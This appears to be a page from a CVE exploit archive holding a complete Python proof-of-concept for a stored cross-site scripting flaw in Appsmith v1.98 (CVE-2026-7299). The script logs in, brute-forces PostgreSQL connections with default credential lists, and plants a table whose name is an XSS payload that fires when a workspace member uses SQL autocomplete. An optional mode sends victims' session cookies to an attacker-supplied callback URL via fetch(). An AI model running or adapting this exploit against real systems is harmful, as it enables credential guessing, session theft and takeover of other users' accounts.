5585 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / exploit.py PY
#!/usr/bin/env python3
"""
Appsmith Stored XSS via SQL Autocomplete (CVE-2026-7299)
"""

import argparse
import json
import random
import string
import sys
import requests
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

class C:
    RED = "\033[91m"
    GREEN = "\033[92m"
    YELLOW = "\033[93m"
    BLUE = "\033[94m"
    PURPLE = "\033[95m"
    CYAN = "\033[96m"
    WHITE = "\033[97m"
    GREY = "\033[90m"
    BRED = "\033[1;91m"
    BGREEN = "\033[1;92m"
    BYELLOW = "\033[1;93m"
    BBLUE = "\033[1;94m"
    BPURPLE = "\033[1;95m"
    BCYAN = "\033[1;96m"
    BWHITE = "\033[1;97m"
    BOLD = "\033[1m"
    DIM = "\033[2m"
    END = "\033[0m"


class out:
    @staticmethod
    def _pad(level):
        return "  " * level

    @staticmethod
    def success(msg, level=1):
        print(f"{out._pad(level)}{C.BGREEN}\u2022{C.END} {msg}")

    @staticmethod
    def error(msg, level=1):
        print(f"{out._pad(level)}{C.BRED}\u2022{C.END} {C.RED}{msg}{C.END}")

    @staticmethod
    def warn(msg, level=1):
        print(f"{out._pad(level)}{C.BYELLOW}\u2022{C.END} {C.YELLOW}{msg}{C.END}")

    @staticmethod
    def info(msg, level=1):
        print(f"{out._pad(level)}{C.BCYAN}\u2022{C.END} {msg}")

    @staticmethod
    def step(msg, level=1):
        print(f"{out._pad(level)}{C.BPURPLE}\u2022{C.END} {msg}")

    @staticmethod
    def detail(label, value, level=2):
        print(f"{out._pad(level)}{C.GREY}\u2022 {label}:{C.END} {value}")

    @staticmethod
    def dim(msg, level=2):
        print(f"{out._pad(level)}{C.GREY}\u2022 {msg}{C.END}")

    @staticmethod
    def progress(msg, level=2):
        pad = out._pad(level)
        sys.stdout.write(f"\r{pad}{C.GREY}\u2022 {msg}{C.END}\033[K")
        sys.stdout.flush()

    @staticmethod
    def blank():
        print()


BANNER = f'''

{C.PURPLE}M""MMMM""M MP""""""`MM MP""""""`MM {C.END} {C.BOLD}  MP""""""`MM M"""""`'"""`YM M""M M""""""""M M""MMMMM""MM 
{C.PURPLE}M  `MM'  M M  mmmmm..M M  mmmmm..M {C.END}   {C.BOLD}M  mmmmm..M M  mm.  mm.  M M  M Mmmm  mmmM M  MMMMM  MM 
{C.PURPLE}MM.    .MM M.      `YM M.      `YM {C.END}   {C.BOLD}M.      `YM M  MMM  MMM  M M  M MMMM  MMMM M         `M 
{C.PURPLE}M  .mm.  M MMMMMMM.  M MMMMMMM.  M {C.END}   {C.BOLD}MMMMMMM.  M M  MMM  MMM  M M  M MMMM  MMMM M  MMMMM  MM 
{C.PURPLE}M  MMMM  M M. .MMM'  M M. .MMM'  M {C.END}   {C.BOLD}M. .MMM'  M M  MMM  MMM  M M  M MMMM  MMMM M  MMMMM  MM 
{C.PURPLE}M  MMMM  M Mb.     .dM Mb.     .dM {C.END}   {C.BOLD}Mb.     .dM M  MMM  MMM  M M  M MMMM  MMMM M  MMMMM  MM 
{C.PURPLE}MMMMMMMMMM MMMMMMMMMMM MMMMMMMMMMM {C.END}   {C.BOLD}MMMMMMMMMMM MMMMMMMMMMMMMM MMMM MMMMMMMMMM MMMMMMMMMMMM 
                            
                                    {C.BGREEN}@stuub{C.END}
                             Exploiting CVE-2026-7299
                            Stored XSS - Appsmith v1.98                                                                        

'''

PAYLOADS = {
    "alert": '<img src=x onerror=alert(document.domain)>',
}


class AppsmithExploit:
    def __init__(self, base_url, email, password, verify_ssl=False):
        self.base_url = base_url.rstrip("/")
        self.email = email
        self.password = password
        self.session = requests.Session()
        self.session.verify = verify_ssl
        self.xsrf_token = None

    def _headers(self):
        h = {"Content-Type": "application/json"}
        if self.xsrf_token:
            h["X-XSRF-TOKEN"] = self.xsrf_token
        return h

    def _update_xsrf(self, response):
        token = response.cookies.get("XSRF-TOKEN")
        if token:
            self.xsrf_token = token

    def login(self):
        out.step("Authenticating...")

        r = self.session.get(f"{self.base_url}/api/v1/users/me")
        self._update_xsrf(r)

        r = self.session.post(
            f"{self.base_url}/api/v1/login",
            headers={"Content-Type": "application/x-www-form-urlencoded",
                     "X-XSRF-TOKEN": self.xsrf_token or ""},
            data={"username": self.email, "password": self.password},
            allow_redirects=False,
        )
        self._update_xsrf(r)

        if r.status_code not in (200, 301, 302):
            out.error("Login failed", level=2)
            out.dim(r.text[:200])
            sys.exit(1)

        r = self.session.get(f"{self.base_url}/api/v1/users/me",
                             headers=self._headers())
        self._update_xsrf(r)
        data = r.json()
        if data.get("data", {}).get("isAnonymous", True):
            out.error("Login failed, still anonymous", level=2)
            sys.exit(1)

        email = data["data"].get("email", "unknown")
        out.success(f"Authenticated as {C.BGREEN}{email}{C.END}", level=2)
        return data["data"]
        

    def get_workspace_context(self):
        suffix = ''.join(random.choices(string.ascii_lowercase + string.digits, k=6))

        out.step("Setting up workspace...")
        r = self.session.post(
            f"{self.base_url}/api/v1/workspaces",
            headers=self._headers(),
            json={"name": f"poc-{suffix}"})
        self._update_xsrf(r)

        if r.status_code not in (200, 201):
            out.warn(f"Workspace creation failed ({r.status_code}), using existing", level=2)
            r = self.session.get(f"{self.base_url}/api/v1/workspaces/home",
                                 headers=self._headers())
            self._update_xsrf(r)
            workspaces = r.json().get("data", [])
            if not workspaces:
                out.error("No workspaces found", level=2)
                sys.exit(1)
            workspace = workspaces[0]
        else:
            workspace = r.json()["data"]

        workspace_id = workspace["id"]
        out.success(f"Workspace {C.BWHITE}{workspace.get('name', 'N/A')}{C.END}", level=2)

        r = self.session.post(
            f"{self.base_url}/api/v1/applications",
            headers=self._headers(),
            json={"name": f"app-{suffix}", "workspaceId": workspace_id})
        self._update_xsrf(r)

        if r.status_code not in (200, 201):
            out.error(f"Failed to create application: {r.status_code}", level=2)
            sys.exit(1)

        app = r.json()["data"]
        app_id = app["id"]
        pages = app.get("pages", [])

        if not pages:
            out.error("No pages found", level=2)
            sys.exit(1)

        page_id = pages[0].get("id") or pages[0].get("baseId")
        out.success(f"Application {C.BWHITE}{app.get('name', 'N/A')}{C.END}", level=2)

        return workspace_id, app_id, page_id
        

    def find_postgres_datasource(self, workspace_id):
        out.step("Searching for writable PostgreSQL datasources...")

        r = self.session.get(
            f"{self.base_url}/api/v1/datasources?workspaceId={workspace_id}",
            headers=self._headers())
        self._update_xsrf(r)

        resp = r.json()
        if resp.get("responseMeta", {}).get("status") != 200:
            out.warn("Datasource listing failed", level=2)
            return None

        for ds in resp.get("data", []):
            if ds.get("pluginName", "").lower() == "postgresql":
                storages = ds.get("datasourceStorages", {})
                for _, storage in storages.items():
                    config = storage.get("datasourceConfiguration", {})
                    mode = config.get("connection", {}).get("mode", "READ_WRITE")
                    if mode == "READ_WRITE":
                        out.success(f"Found {C.BCYAN}{ds['name']}{C.END}", level=2)
                        return ds
                out.dim(f"{ds['name']} is READ_ONLY, skipping", level=2)

        out.warn("No writable PostgreSQL datasource found", level=2)
        return None

    dfl_db_hosts = [
        "host.docker.internal", "172.17.0.1", "postgres", "postgresql",
        "db", "database", "appsmith-pg", "localhost",
    ]
    dfl_db_ports = [5432]
    dfl_db_names = ["postgres", "testdb", "appsmith"]
    dfl_db_user = ["postgres", "appsmith", "admin"]
    dfl_db_pass = ["postgres", "password", "test123", "appsmith", "admin"]

    def test_datasource_connection(self, plugin_id, workspace_id, host, port,
                                   db_name, username, password):
        payload = {
            "pluginId": plugin_id,
            "datasourceConfiguration": {
                "connection": {"mode": "READ_WRITE", "ssl": {"authType": "DEFAULT"}},
                "endpoints": [{"host": host, "port": port}],
                "authentication": {
                    "databaseName": db_name,
                    "username": username,
                    "password": password,
                },
                "properties": [None, {"key": "Connection method", "value": "STANDARD"}],
            },
            "workspaceId": workspace_id,
        }
        headers = self._headers()
        headers["X-Appsmith-EnvironmentId"] = "unused_env"
        try:
            r = self.session.post(
                f"{self.base_url}/api/v1/datasources/test",
                headers=headers, json=payload, timeout=10)
            self._update_xsrf(r)
            return r.json().get("data", {}).get("success", False)
        except Exception:
            return False

    def auto_discover_datasource(self, workspace_id, db_host=None, db_port=None,
                                  db_name=None, db_user=None, db_pass=None):
        out.step("Auto-discovering PostgreSQL connection...")
        plugin_id = self.get_postgres_plugin_id(workspace_id)

        hosts = [db_host] if db_host else self.dfl_db_hosts
        ports = [db_port] if db_port else self.dfl_db_ports
        names = [db_name] if db_name else self.dfl_db_names
        users = [db_user] if db_user else self.dfl_db_user
        passes = [db_pass] if db_pass else self.dfl_db_pass

        for host in hosts:
            for port in ports:
                for name in names:
                    for user in users:
                        for pwd in passes:
                            combo = f"{user}:{pwd}@{host}:{port}/{name}"
                            out.progress(f"Trying {combo:<50}")
                            if self.test_datasource_connection(
                                    plugin_id, workspace_id,
                                    host, port, name, user, pwd):
                                print()
                                out.success(f"Connection found {C.BGREEN}{combo}{C.END}", level=2)
                                return self.create_datasource(
                                    workspace_id, host, port, name, user, pwd)

        print()
        out.error("No valid PostgreSQL connection found", level=2)
        out.dim("Provide credentials with --db-host, --db-user, --db-pass, --db-name")
        sys.exit(1)

    def get_postgres_plugin_id(self, workspace_id):
        r = self.session.get(
            f"{self.base_url}/api/v1/plugins?workspaceId={workspace_id}",
            headers=self._headers())
        self._update_xsrf(r)
        for p in r.json().get("data", []):
            pname = p.get("name", "").lower()
            pkg = p.get("packageName", "").lower()
            if "postgres" in pname or "postgres" in pkg:
                return p["id"]
        out.error("PostgreSQL plugin not found", level=2)
        sys.exit(1)

    def create_datasource(self, workspace_id, db_host, db_port, db_name,
                          db_user, db_pass):
        out.step(f"Creating datasource {C.BWHITE}{db_host}:{db_port}/{db_name}{C.END}", level=2)

        plugin_id = self.get_postgres_plugin_id(workspace_id)
        payload = {
            "pluginId": plugin_id,
            "datasourceStorages": {
                "unused_env": {
                    "datasourceConfiguration": {
                        "properties": [
                            None,
                            {"key": "Connection method", "value": "STANDARD"}
                        ],
                        "connection": {
                            "mode": "READ_WRITE",
                            "ssl": {"authType": "DEFAULT"}
                        },
                        "endpoints": [{"port": str(db_port), "host": db_host}],
                        "sshProxy": {"endpoints": [{"port": "22"}]},
                        "authentication": {
                            "databaseName": db_name,
                            "username": db_user,
                            "password": db_pass,
                        },
                        "url": "",
                    },
                    "datasourceId": "",
                    "environmentId": "unused_env",
                    "isConfigured": True,
                }
            },
            "name": f"ds-{workspace_id[:8]}",
            "workspaceId": workspace_id,
        }

        r = self.session.post(f"{self.base_url}/api/v1/datasources",
                              headers=self._headers(), json=payload)
        self._update_xsrf(r)

        if r.status_code != 201:
            out.error(f"Failed to create datasource: {r.status_code}", level=3)
            out.dim(r.text[:300], level=3)
            sys.exit(1)

        ds = r.json()["data"]
        out.success(f"Datasource created {C.GREY}({ds['id']}){C.END}", level=3)
        return ds

    def create_action(self, datasource, app_id, page_id, workspace_id,
                      xss_payload):
        out.step("Injecting XSS payload...")

        sql = f'CREATE TABLE "{xss_payload}" (id serial primary key);'
        payload = {
            "applicationId": app_id,
            "workspaceId": workspace_id,
            "pluginType": "DB",
            "pluginId": datasource["pluginId"],
            "datasource": {
                "id": datasource["id"],
                "name": datasource["name"],
                "pluginId": datasource["pluginId"],
            },
            "pageId": page_id,
            "actionConfiguration": {
                "timeoutInMillisecond": 10000,
                "paginationType": "NONE",
                "encodeParamsToggle": True,
                "pluginSpecifiedTemplates": [{"value": True}],
                "body": sql,
            },
            "name": "xss_poc_query",
        }

        r = self.session.post(f"{self.base_url}/api/v1/actions",
                              headers=self._headers(), json=payload)
        self._update_xsrf(r)

        if r.status_code not in (200, 201):
            out.error(f"Failed to create action: {r.status_code}", level=2)
            out.dim(r.text[:500], level=2)
            sys.exit(1)

        action = r.json()["data"]
        out.success(f"Action created {C.GREY}({action['id']}){C.END}", level=2)
        out.detail("SQL", f"{C.BWHITE}{sql}{C.END}")
        return action["id"]

    def execute_action(self, action_id):
        out.step("Executing query...", level=2)

        execute_dto = json.dumps({
            "actionId": action_id,
            "viewMode": False,
            "paramProperties": {},
        })

        body = (
            f"------ExploitBoundary\r\n"
            f'Content-Disposition: form-data; name="executeActionDTO"\r\n'
            f"\r\n"
            f"{execute_dto}\r\n"
            f"------ExploitBoundary--\r\n"
        )

        headers = {
            "Content-Type": "multipart/form-data; boundary=----ExploitBoundary",
            "X-Appsmith-EnvironmentId": "unused_env",
        }
        if self.xsrf_token:
            headers["X-XSRF-TOKEN"] = self.xsrf_token

        r = self.session.post(
            f"{self.base_url}/api/v1/actions/execute",
            headers=headers, data=body.encode())
        self._update_xsrf(r)

        if r.status_code != 200:
            out.error(f"Execution failed: {r.status_code}", level=3)
            sys.exit(1)

        result = r.json()
        success = result.get("data", {}).get("isExecutionSuccess", False)

        if success:
            out.success("Malicious table created", level=3)
        else:
            error = result.get("data", {}).get("body", "Unknown error")
            if "already exists" in str(error):
                out.warn("Table already exists (payload previously injected)", level=3)
            else:
                out.error(f"Query error: {error}", level=3)
                sys.exit(1)

        return success


    def refresh_structure(self, datasource_id):
        out.step("Refreshing datasource structure...")

        r = self.session.get(
            f"{self.base_url}/api/v1/datasources/{datasource_id}/structure"
            f"?ignoreCache=true",
            headers=self._headers())
        self._update_xsrf(r)

        if r.status_code == 200:
            tables = r.json().get("data", {}).get("tables", [])
            out.success(f"{C.BWHITE}{len(tables)}{C.END} tables loaded into autocomplete", level=2)
            for t in tables:
                name = t.get("name", "")
                if "<" in name or "onerror" in name:
                    out.success(f"Poisoned table: {C.BGREEN}{name[:70]}{C.END}", level=2)
                    return True
        else:
            out.warn(f"Structure refresh returned {r.status_code}", level=2)

        return True

    def run(self, xss_payload, db_host=None, db_port=None, db_name=None,
            db_user=None, db_pass=None):

        self.login()
        out.blank()

        workspace_id, app_id, page_id = self.get_workspace_context()
        out.blank()

        ds = self.find_postgres_datasource(workspace_id)
        if not ds:
            ds = self.auto_discover_datasource(
                workspace_id, db_host, db_port, db_name, db_user, db_pass)
        out.blank()

        action_id = self.create_action(ds, app_id, page_id, workspace_id,
                                       xss_payload)
        self.execute_action(action_id)
        out.blank()

        self.refresh_structure(ds["id"])

        out.blank()
        out.success(f"{C.BGREEN}Exploit complete{C.END}")
        out.dim("XSS payload stored as a database table name.")
        out.dim("Will fires when a workspace member triggers SQL autocomplete.")
        out.blank()
        out.detail("Trigger", f"Type {C.BWHITE}SELECT * FROM{C.END} in the SQL editor")
        out.detail("Payload", f"{C.BWHITE}{xss_payload}{C.END}")
        out.detail("Datasource", f"{C.BWHITE}{ds['name']}{C.END} {C.GREY}({ds['id']}){C.END}")
        out.blank()


def main():
    print(BANNER)

    parser = argparse.ArgumentParser(
        description="CVE-2026-7299 - Appsmith Stored XSS via SQL Autocomplete")

    parser.add_argument("-u", "--url", required=True,
                        help="Appsmith base URL (e.g. http://localhost:4444)")
    parser.add_argument("-e", "--email", required=True,
                        help="Attacker's Appsmith email")
    parser.add_argument("-p", "--password", required=True,
                        help="Attacker's Appsmith password")

    parser.add_argument("-c", "--callback-url",
                        help="Callback URL for cookie exfiltration")
    parser.add_argument("-x", "--custom-payload",
                        help="Custom XSS payload string")

    parser.add_argument("-H", "--db-host", help="PostgreSQL host")
    parser.add_argument("-P", "--db-port", type=int, default=5432,
                        help="PostgreSQL port (default: 5432)")
    parser.add_argument("-d", "--db-name", help="PostgreSQL database name")
    parser.add_argument("-U", "--db-user", help="PostgreSQL username")
    parser.add_argument("-W", "--db-pass", help="PostgreSQL password")

    parser.add_argument("-k", "--no-verify-ssl", action="store_true",
                        help="Disable SSL verification")

    args = parser.parse_args()

    if args.custom_payload:
        xss_payload = args.custom_payload
        if len(xss_payload) > 63:
            out.warn(f"Custom payload is {len(xss_payload)} chars (PostgreSQL limit: 63)")
            out.dim("Payload will be truncated by the database")
    elif args.callback_url:
        cb = args.callback_url.rstrip("/")
        short_cb = cb.replace("https://", "//").replace("http://", "//")
        candidates = [
            f"<img src=x onerror=fetch('{cb}?c='+document.cookie)>",
            f"<img src=x onerror=fetch('{cb}?'+document.cookie)>",
            f"<img src=x onerror=fetch('{short_cb}?'+document.cookie)>",
        ]
        xss_payload = None
        for c in candidates:
            if len(c) <= 63:
                xss_payload = c
        if not xss_payload:
            max_url = 63 - len("<img src=x onerror=fetch('//?'+document.cookie)>")
            out.error("Callback URL too long for PostgreSQL 63-char identifier limit")
            out.dim(f"Max URL length: ~{max_url} chars (yours: {len(short_cb)})")
            out.dim("Use port 80 or a short domain/ngrok URL")
            sys.exit(1)
        out.info(f"Callback: {C.BWHITE}{xss_payload}{C.END} {C.GREY}({len(xss_payload)}/63){C.END}")
    else:
        xss_payload = PAYLOADS["alert"]

    out.blank()

    exploit = AppsmithExploit(
        base_url=args.url,
        email=args.email,
        password=args.password,
        verify_ssl=not args.no_verify_ssl,
    )

    exploit.run(
        xss_payload=xss_payload,
        db_host=args.db_host,
        db_port=args.db_port,
        db_name=args.db_name,
        db_user=args.db_user,
        db_pass=args.db_pass,
    )


if __name__ == "__main__":
    try:
        main()
    except KeyboardInterrupt:
        print(f"\n\n  {C.BYELLOW}\u2022{C.END} {C.GREY}Interrupted.{C.END}\n")
        sys.exit(0)